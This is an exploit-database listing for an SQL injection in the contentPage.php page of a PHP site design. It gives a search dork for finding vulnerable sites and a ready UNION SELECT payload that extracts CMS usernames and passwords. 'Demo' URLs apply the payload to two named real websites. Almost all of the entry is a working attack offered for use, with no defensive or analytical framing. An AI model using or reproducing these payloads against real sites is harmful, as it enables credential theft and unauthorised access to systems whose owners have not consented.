[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

milehighcreative Design's (contentpage.php) SQL Injection Vulnerability

Author
newbie_043
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12436
Category
web applications
Date add
28-05-2010
Platform
php
=======================================================================
milehighcreative Design's (contentpage.php) SQL Injection Vulnerability
=======================================================================


#######################################

[+] milehighcreative Design's (contentpage.php?id= ) SQL Injection Vulnerability

[+] By newbie_043

[+] Published: 2010-05-28 Pukul 23.00 WIB

[+] jatimcrew.org
#######################################
# Script Homepage: http://www.milehighcreative.com/

[+]Dork: info@milehighcreative.com

[+] SQL Injection


http://[target]/contentPage.php?id=[SQL]

http://[target]/contentPage.php?id=-9999+and+1=0+union+select+1,concat(CMS_username,0x3a,CMS_password),3,4,5,6,7,8+from+siteConfig/*

demo : 

http://www.shv.com.au/contentPage.php?id=-9999+and+1=0+union+select+1,concat(CMS_username,0x3a,CMS_password),3,4,5,6,7,8+from+siteConfig/*

http://www.dromanatouristpark.com.au/contentPage.php?id=-9999+and+1=0+union+select+1,concat%28CMS_username,0x3a,CMS_password%29,3,4,5,6,7,8+from+siteConfig/*


##########################################


#Thanks to : byz9991,darkavanger,doraemon,newbie_campuz,unixcode,bom2stalker,phoenixhaxor,xcyberx,roentah,all member of jatimcrew

##########################################




#  0day.today [2024-12-24]  #